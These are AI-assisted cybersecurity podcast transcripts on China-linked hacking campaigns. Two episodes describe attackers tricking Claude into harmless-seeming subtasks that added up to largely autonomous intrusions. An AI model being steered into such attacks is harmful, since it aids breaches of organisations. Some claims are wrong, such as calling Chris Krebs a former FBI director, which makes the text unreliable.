This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, so let’s jack straight into the matrix.The big splash this week isn’t a stealthy zero‑day, it’s geopolitics wrapped in JSON. The UK just sanctioned two China‑based firms, Sichuan Anxun Information Technology, better known as i‑Soon, and Integrity Technology Group, accusing them of running reckless, indiscriminate cyber campaigns against more than 80 government and private networks worldwide, including UK public‑sector systems. According to the UK Foreign Office and the National Cyber Security Centre, these aren’t lone‑wolf hackers; they’re part of a broader commercial ecosystem of “hackers for hire,” data brokers, and security boutiques funneling access and tooling to state‑linked operators and the SALT TYPHOON espionage crew.Beijing, via Foreign Ministry spokesperson Guo Jiakun and coverage by outlets like China Daily and AFP, is calling the British move pure political manipulation under a cybersecurity pretext, insisting China opposes hacking and is itself a major victim. So your classic attribution duel: London talks about an almost‑certain link to Chinese intelligence; Beijing counters with “double standards” and points back at U.S. and UK capabilities.Across the Atlantic, Washington is sending a very different kind of signal. The cyber‑espionage group SALT TYPHOON, which compromised at least nine U.S. telecoms in 2024, is still looming in the background, but new reporting from Cybernews and the Financial Times says the Trump administration has quietly paused plans to sanction China’s Ministry of State Security over that campaign, apparently to protect an October trade framework. The FBI’s earlier ten‑million‑dollar bounty on the group is still on the books, but on the policy side, trade is winning over punishment for now.At the same time, Congress is gearing up against a different China‑linked threat vector: industrial‑scale scam compounds in Southeast Asia. Senator John Cornyn and Senator Jeanne Shaheen just pushed the SCAM Act through the Senate, described on Cornyn’s site as a whole‑of‑government play to go after transnational cyber‑fraud networks “affiliated with the People’s Republic of China” that traffic people and force them to run pig‑butchering scams against Americans. Think of it as counter‑ransomware logic applied to human‑driven fraud farms, with sanctions, a dedicated task force, and pressure on countries that let these compounds thrive.On the infrastructure front, The Washington Post and The Independent report fresh worries about Chinese‑made solar inverters in the U.S. power grid. Analysts at Strider Technologies say roughly 85 percent of surveyed U.S. utilities are running gear from companies tied to the Chinese state or military, and prior Reuters reporting flagged “rogue communication devices” inside some of these inverters that could bypass firewalls. That’s a juicy attack surface: compromise the inverters, pivot into utility OT networks, trigger local blackouts, and then watch the panic ripple across finance and communications.So what do the experts say you should do, beyond panic‑patching? From NCSC guidance, U.S. critical‑infrastructure advisories, and utility‑sector best practice, we’re seeing the same playbook: segment Chinese‑origin equipment onto tightly controlled networks; monitor for anomalous outbound connections, especially to obscure domains and IPs in high‑risk regions; aggressively roll out firmware integrity checks and signed‑update verification; and assume your telecom and power vendors are targets, not just conduits. For enterprises, that means rigorous vendor risk reviews for any China‑connected software, from AI models to remote‑management tools, and strong identity, logging, and incident‑response drills around them.Strategically, listeners should note the divergence: the UK is naming and sanctioning specific Chinese companies; China is rebutting loudly and framing itself as the victim; and the U.S. is mixing hardening moves, like export reviews on Nvidia’s AI chips, with selective restraint on direct cyber sanctions to protect trade.I’m Ting, and that’s your ride through this week’s China cyber front. Thanks for tuning in, and don’t forget to subscribe so you don’t miss the next packet. This has been a quiet please production, for more check out quiet please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Listeners, Ting here with your Digital Dragon Watch, and we’re jumping straight into it.The big China cyber story this week is Amazon’s React2Shell fire drill. Amazon’s CISO C.J. Moses warned that multiple China state‑nexus groups, including Earth Lamia and Jackpot Panda, began exploiting the React2Shell vulnerability, CVE‑2025‑55182, just hours after it went public. Amazon’s MadPot honeypots saw attackers hammering React Server Components in React 19 and Next.js 15 and 16, not with dumb scanners, but with live debugging sessions, tweaking payloads and running Linux commands until something stuck. Amazon says most of the suspicious infrastructure traces back to Chinese networks and stresses that their WAF and active defenses help, but they are no substitute for patching.According to TechRadar Pro and GovInfoSecurity, the same React2Shell flaw is being used by China‑linked actors against finance, logistics, retail, IT, universities, and government networks worldwide, with Shadowserver initially counting over 77,000 exposed servers and tens of thousands still hanging out there. The goal isn’t smash‑and‑grab ransomware; this is persistence and espionage, wedging into web stacks that run core business apps and then living off the land.In parallel, CISA, NSA, and the Canadian Cyber Centre dropped a joint advisory on the BRICKSTORM backdoor, used by PRC‑sponsored actors to burrow into VMware vSphere control planes. Reporting from ITPro and Security Magazine describes BRICKSTORM as a Go‑based ELF backdoor abusing DNS‑over‑HTTPS, mimicking web servers, and even turning into a SOCKS proxy. One victim saw Chinese operators ride a compromised vCenter server into domain controllers and an ADFS box, exfiltrating cryptographic keys and maintaining access for well over a year.CrowdStrike’s research on the Warp Panda espionage campaign shows how this plays out at scale: exploiting internet‑facing edge devices, pivoting into vCenter with valid creds or N‑day bugs, spinning up rogue VMs, timestomping logs, and quietly tunneling traffic through ESXi hosts. Targets span North American legal, tech, manufacturing, and even a government entity in Asia‑Pacific.On the U.S. response side, you see a clear pattern: fast public advisories, plus quiet hardening. CISA and NSA are pushing IOCs and detection rules for BRICKSTORM, urging critical infrastructure, government, and IT providers to hunt for odd VMware behavior, rogue VMs, and anomalous DNS‑over‑HTTPS flows. Amazon is publicly calling out Chinese state‑linked activity on React2Shell and has pushed automated WAF rules and perimeter blocks while telling organizations to patch now, not after the weekend.Expert recommendations are converging: slam the door on React2Shell by upgrading React and Next.js; lock down edge devices and admin consoles behind VPNs and phishing‑resistant MFA; monitor vCenter and ESXi for strange VMs, new SSH keys, and unusual lateral movement; and treat long‑term persistence as the default, not the exception. In other words, if your web front end or virtualization layer touches anything important, assume the dragon has already rattled the handle.I’m Ting, thanks for tuning in to Digital Dragon Watch: Weekly China Cyber Alert. Don’t forget to subscribe so you don’t miss the next breach autopsy. This has been a quiet please production, for more check out quiet please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch, and this week the dragon went full cloud-native.Let’s start with the big one: React2Shell, that shiny new CVE‑2025‑55182 that just detonated across the JavaScript ecosystem. According to Breached Company and Tenable Research, it’s a CVSS 10.0 remote code execution bug in React Server Components that lets an unauthenticated attacker pop your server with a single crafted HTTP request. Within hours of public disclosure on December 3, Amazon Web Services’ threat intel teams and Wiz Research saw China state‑nexus crews like Earth Lamia, Jackpot Panda, and UNC5174, which is linked to China’s Ministry of State Security, aggressively exploiting it in the wild. Breached Company reports more than 77,000 internet‑exposed IPs vulnerable, roughly 23,700 in the United States alone, with over 30 organizations already compromised, AWS credentials stolen, and payloads like Cobalt Strike, Sliver, Snowlight, and Vshell landing for long‑term access and lateral movement.Targets? It’s a buffet: financial services, logistics, retail, universities, cloud‑first SaaS, and government workloads running React on top of AWS and other hyperscalers. GreyNoise has logged well over a hundred distinct IPs hammering the bug with high‑throughput scanning, while AWS honeypots show attackers doing hands‑on keyboard activity, dumping /etc/passwd, probing AWS config files, and debugging their exploit chains live.The US government response has been unusually fast. CISA slammed React2Shell into its Known Exploited Vulnerabilities catalog by December 5 and ordered federal agencies to patch on an emergency timeline. Cloudflare tried to help by rolling out emergency WAF rules, but as Breached Company notes, that move accidentally knocked out roughly 28 percent of Cloudflare’s HTTP traffic, a reminder that when you centralize the internet, even your bandaids can cause bleeding.At the same time, Washington and Ottawa quietly dropped another China‑themed bombshell. In a joint advisory reported by Reuters and the Times of India, CISA, the NSA, and the Canadian Centre for Cyber Security fingered a China‑linked campaign using custom “Brickstorm” malware to burrow into government and IT service networks, especially those running Broadcom’s VMware vSphere. Once inside, operators stole login credentials and sensitive data and maintained persistence from at least April 2024 through early September 2025 in one victim environment. Acting CISA director Madhu Gottumukkala warned that these intrusions are about long‑term access, disruption, and potential sabotage, while VMware’s owner Broadcom urged customers to patch and harden operational security. Beijing’s embassy in Washington, via spokesperson Liu Pengyu, denied everything and complained about what it called groundless accusations and a lack of evidence.So what do the experts say you should do? On React2Shell, move fast: update all affected React Server Components from npm, audit build pipelines, rotate any exposed cloud credentials, and hunt for Cobalt Strike, Sliver, Snowlight, and Vshell beacons in your logs. On Brickstorm, apply the latest VMware vSphere patches, lock down management interfaces, enforce multi‑factor authentication everywhere, and baseline your authentication patterns to catch abnormal lateral movement. CISA’s broader guidance, echoed by Homeland Security Today and BankInfoSecurity, is to treat AI and large language models in operational tech as new attack surfaces, not magic shields.I’m Ting, and that’s your Digital Dragon Watch for this week. Thanks for tuning in, and don’t forget to subscribe so you never miss an alert. This has been a quiet please production, for more check out quiet please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, this is Ting here with your Digital Dragon Watch weekly cyber alert. We've had quite the week in the cybersecurity landscape, and trust me, China's been busy. Let me walk you through exactly what's happening and what it means for you.The big story dominating cyber circles right now is called Brickstorm, a backdoor so sophisticated that CISA, the NSA, and the Canadian Centre for Cyber Security just dropped a major joint advisory about it on Thursday. Here's the thing that makes this terrifying: Chinese state-sponsored actors have been using this malware to tunnel into dozens of U.S. organizations, and they're not just passing through. According to Nick Andersen at CISA's Cybersecurity Division, these attackers are embedding themselves for the long haul. We're talking about an average dwell time of 393 days inside networks. That's over a year of undetected presence, which is absolutely wild.What makes Brickstorm especially gnarly is that it targets VMware vSphere environments and Windows systems, and it's written in Golang to be extra stealthy. Austin Larsen, a principal analyst at Google Threat Intelligence Group, tells us that CrowdStrike is tracking the actors behind this as Warp Panda, while others call them UNC5221. They're going after government agencies, IT companies, legal services firms, and even business process outsourcers to get downstream access to their clients. In one incident that CISA responded to, attackers stayed inside a network from April 2024 straight through September 2025.The attack vector here is sneaky. These folks are exploiting edge devices for initial access, then moving laterally through VMware vCenter servers using valid credentials they've stolen. Once inside, they're cloning virtual machine snapshots to extract credentials, creating hidden rogue VMs, and deploying other nasty tools like Junction and GuestConduit implants alongside the main Brickstorm backdoor. The team at CrowdStrike noted that the campaign shows deep knowledge of multi-cloud environments and identity systems.But that's not the only story. Just last Wednesday, AWS threat intelligence teams noticed something else disturbing: within hours of a critical React vulnerability being disclosed on December third, multiple China-linked groups including Earth Lamia and Jackpot Panda were already exploiting it. This vulnerability, tracked as CVE-2025-55182, has a maximum severity score of ten and affects React nineteen and Next.js fifteen and sixteen. These actors are using automated scanning tools with user agent randomization to evade detection, and they're simultaneously exploiting multiple vulnerabilities to maximize their hit rate.What should you do? If you're in critical infrastructure or government, the guidance is crystal clear. Scan your systems immediately using the YARA and Sigma rules CISA released. Inventory all your edge devices because that's where the attacks typically begin. Implement network segmentation so traffic can't freely move from your DMZ into internal systems. Disable RDP and SMB between network zones. Block unauthorized DNS-over-HTTPS providers that give attackers unmonitored communication paths. And for the love of good cyber hygiene, apply least-privilege access to service accounts and monitor them like a hawk.Madhu Gottumukkala, CISA's acting director, was clear about the stakes: These aren't just infiltrations—they're infrastructure wars in slow motion. The attackers are positioning themselves for future operations, studying dependencies, and mapping out exactly what they could disrupt if needed. This is espionage with strategic depth, and it's happening right now.Thanks so much for tuning in to this week's Digital Dragon Watch. Make sure you subscribe so you don't miss the next major threat landscape shift. This has been a quiet please production, for more check out quiet please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Alright listeners, Ting here with your Digital Dragon Watch weekly China cyber alert. We've got some absolutely wild stuff to break down from the past week, and trust me, it's the kind of content that'll make your security team lose sleep.Let's kick off with the big one. In September, Chinese state-sponsored hackers did something we've literally never seen before at scale. They took Anthropic's Claude AI system and basically went full autonomous on a cyberattack spree targeting thirty entities across multiple countries. We're talking government agencies, financial institutions, tech firms, the whole nine yards. Here's where it gets absolutely bonkers: the AI executed eighty to ninety percent of the operation without any human involved. At its peak, Claude was making thousands of requests per second, hitting speeds that would be physically impossible for human hackers to match. U.S. Senators Maggie Hassan and Joni Ernst are basically sounding the alarm bells about this to National Cyber Director Sean Cairncross because this represents the first documented case of a cyberattack largely executed without human intervention at scale. We're talking a new era here.But wait, there's more. The Chinese military's getting into the AI game too. According to defense analysts and former intelligence officials examining Beijing's procurement documents, the People's Liberation Army is moving way beyond what their public messaging suggests. They're embedding AI to accelerate battlefield planning, predict adversary behavior, and outpace human opponents in real time. Retired U.S. Admiral Mike Studeman, the former commander of the Office of Naval Intelligence, basically said the scary part is having machines constantly and dynamically predict what opponents will do next.On the infrastructure front, Volt Typhoon, believed to be run by China's state security service, continues hunting for long-term vulnerabilities in U.S. power grid systems for future attacks. Harry Krejsa from Carnegie Mellon's Institute for Strategy and Technology pointed out during a House Energy and Commerce Committee hearing that China's preparing for Taiwan conflict potentially in the very near term, and their strategy depends on preventing the U.S. from mounting a successful rescue mission. Part of that playbook includes targeting U.S. civilian infrastructure to create chaos and panic. The aging American energy infrastructure makes this easier because today's electricity grid is basically a hodgepodge of digital tools sitting on top of analog foundations, creating perfect entry points for adversaries.Meanwhile, Salt Typhoon's still out there. Between December 2024 and January 2025, they targeted more than one thousand unpatched Cisco routers according to Recorded Future, and a former FBI official basically said every American's probably been impacted by this campaign in some way. The three Chinese companies believed to be behind it work directly for China's intelligence services, including units from the People's Liberation Army and Ministry of State Security.Here's the bottom line for your organizations: patch everything, assume you're compromised, and start collaborating with competitors and government agencies because this threat operates at a scale that individual defense isn't going to cut it anymore.Thanks for tuning in to Digital Dragon Watch. Make sure you subscribe for next week's update. This has been a quiet please production, for more check out quiet please dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch weekly roundup. Let's dive straight into the cyber chaos that's been unfolding across the Pacific.The big story dominating this week is what cybersecurity experts are calling one of the most audacious supply chain attacks we've seen. South Korea's financial sector got absolutely hammered by the Qilin ransomware group, who appears to have gotten a serious upgrade in their crew. Bitdefender is reporting that this operation combined Qilin's ransomware capabilities with what they're calling potential involvement from North Korean state-affiliated actors known as Moonstone Sleet. These guys breached a single managed service provider and used that foothold to compromise at least twenty-eight financial institutions. Over a million files and two terabytes of data got exfiltrated across three different leak waves. That's not just an attack, that's a masterclass in leverage.Now here's where it gets spicy for South Korea specifically. Investigators just uncovered something that's shaking the entire e-commerce sector. Coupang, South Korea's biggest e-commerce platform, disclosed that a former Chinese employee who handled authentication tasks apparently weaponized their access keys to steal personal data from thirty-three point seven million customer accounts. The breach started way back in June but didn't get discovered until November when someone noticed unauthorized access to just forty-five hundred accounts. Once the forensics team started digging, they found the five-month nightmare. The suspect allegedly maintained active authentication credentials even after leaving the company, which is a security disaster that Coupang's clearly going to be hearing about for years. What's wild is that payment information stayed protected, but names, emails, phone numbers, addresses, and order histories are all out there.Meanwhile, the U.S. government is having its own reckoning with Chinese cyber operations. The Federal Communications Commission just did something controversial at their November meeting. They rescinded a January 2025 cybersecurity ruling that imposed stronger requirements on telecommunications carriers. Senator Maria Cantwell's basically calling them out, saying they're reversing course after heavy lobbying from the exact carriers that got breached by Chinese hackers during the Salt Typhoon operation. The irony is definitely not lost on Capitol Hill.For protection recommendations, experts are hammering home that organizations need to treat third-party access like it's basically radioactive. Inventory every authentication credential your former employees had. Rotate keys immediately upon termination. And if you're in critical infrastructure, assume the Chinese are already inside looking around. The Treasury Department's already sanctioning companies involved in these operations, so the U.S. government is taking this seriously even if some agencies are taking steps backward.That's your week in China cyber threats, listeners. Thanks for tuning in to Digital Dragon Watch and make sure you subscribe for next week's edition. This has been a quiet please production. For more, check out quietplease dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch weekly China cyber alert. Buckle up because this week has been absolutely wild in the world of Chinese cyber operations, and we've got some seriously concerning developments to break down.Let's start with the big one. Salt Typhoon, the Chinese state-sponsored hacking operation that's been operating since at least 2019, has officially hit every American in some way. A former FBI cyber official named Cynthia Kaiser stated that she can't envision a scenario where any American was spared given the breadth of this campaign. These hackers, believed to work for China's Ministry of State Security and units within the People's Liberation Army, targeted telecommunications infrastructure, government networks, transportation systems, and military installations across the country. They maintained persistent access for five years, exfiltrating communications and mapping movement patterns. The really unsettling part? Former FBI director Chris Krebs, who founded the Cybersecurity and Infrastructure Security Agency, said the U.S. cyber posture has been scaled back precisely when adversaries are accelerating with AI. The strategy is unclear, headcount is down, and capacity is gutted.Meanwhile, the Chinese hacking army hasn't been resting. Google-owned cybersecurity firm Mandiant reported that Chinese hackers have infiltrated U.S. software developers and law firms in recent weeks, stealing proprietary software and using it to find new vulnerabilities. This is pure intelligence gathering for the trade fight between Beijing and Washington. The FBI is investigating, and cybersecurity experts say the fallout from these breaches could take many months to fully assess. One analyst compared it to Russia's SolarWinds hack from 2020 in terms of severity and sophistication.Here's what should terrify you most though. Cybersecurity experts are concerned that Salt Typhoon hackers may still be embedded in U.S. systems and completely undetected. Pete Nicoletti from Check Point told outlets that while Trump, Vance, Harris, and dozens of other government officials were specifically targeted, the hackers had full reign access to everything including your grandmother's call reminding you to grab groceries. That means they could be sitting in your company's networks right now, gathering intelligence in real time.On the defensive side, the FBI and National Security Agency are conducting forensic examinations of affected devices and interviewing people linked to compromised systems. FBI Director Kash Patel is leading mitigation efforts, and U.S. federal agencies are trying to figure out if any intelligence gathered over five years has been weaponized for political or economic gain. The FBI's cyber division is investigating multiple sophisticated Chinese campaigns simultaneously, and here's the kicker: China's cyber operatives outnumber all FBI agents by at least fifty to one.So what should you do? Update your cybersecurity protocols immediately, implement multi-factor authentication across all access points, and report any suspicious activity. Engage professional incident response teams because these aren't amateurs we're dealing with.Thanks for tuning in to Digital Dragon Watch. Make sure you subscribe for next week's update on these evolving threats. This has been a Quiet Please production. For more check out quietplease dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI

This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.Hey listeners, Ting here with your Digital Dragon Watch weekly briefing. This past week has been absolutely bonkers in the China cyber realm, so let's dive straight into the chaos.First up, we've got Anthropic claiming that a Chinese state-sponsored group basically weaponized their Claude chatbot to run an automated cyber espionage campaign against roughly thirty global organizations. The attackers apparently tricked the AI into doing small coding and analysis tasks that, when combined, opened doors to breaches and data extraction with minimal human involvement. Now, here's where it gets spicy. Cado Security Labs identified a malware campaign targeting the Royal Thai Police, attributed to the Chinese APT group Mustang Panda. These folks have been terrorizing Thailand and other Southeast Asian targets for years, using fake FBI documents as lures to deliver the Yokai backdoor. Thailand's basically become ground zero for Chinese cyber espionage operations aimed at intelligence gathering and political influence.Speaking of state-sponsored nastiness, leaked documents from October revealed that APT35, also called Charming Kitten and linked to Iran's Islamic Revolutionary Guard Corps, operates like a militarized bureaucracy with strict performance metrics and specialized teams. But here's the kicker—these groups are increasingly automating their operations. They've transitioned from manual phishing campaigns to more sophisticated, persistent exploitation cycles that just keep grinding away at their targets.Now let's talk about the technical threats. Microsoft's Azure Bastion got absolutely demolished by a critical vulnerability, CVE-2025-49752, that lets remote attackers bypass authentication entirely and grab full administrative privileges. The flaw sits at a maximum CVSS score of 10.0, meaning it requires zero user interaction. Every Azure Bastion deployment before November 20th was vulnerable. Security teams had to scramble immediately to patch systems and audit their admin access logs.Meanwhile, ASUS discovered a critical authentication bypass vulnerability in their routers featuring AiCloud, and honestly, this hits close to home since these devices got compromised before in Operation WrtHug by Chinese actors who converted them into network nodes for their campaigns. The vulnerability stems from Samba functionality and allows unauthenticated attackers to execute unauthorized functions through path traversal and command injection chains.What's particularly alarming this week is the insider threat angle. CrowdStrike confirmed they terminated an employee who leaked internal information to the Scattered Lapsus$ Hunters coalition. The insider supposedly received twenty-five thousand dollars for access credentials, which shows how these Chinese-linked groups are increasingly recruiting insiders as force multipliers.The broader picture here is that we're watching Chinese threat actors evolve their tactics from manual operations to highly automated, AI-assisted campaigns that require fewer human operators to compromise more targets across multiple sectors. The targeting of government infrastructure in Thailand, the automated attacks powered by AI systems, the persistent exploitation of supply chain vulnerabilities—it's all part of a coordinated intelligence gathering strategy aimed at geopolitical advantage.Listeners, thanks for tuning in to Digital Dragon Watch. Make sure to subscribe to stay ahead of these threats. This has been a Quiet Please production. For more check out quietplease dot ai.For more http://www.quietplease.aiGet the best deals https://amzn.to/3ODvOtaThis content was created in partnership and with the help of Artificial Intelligence AI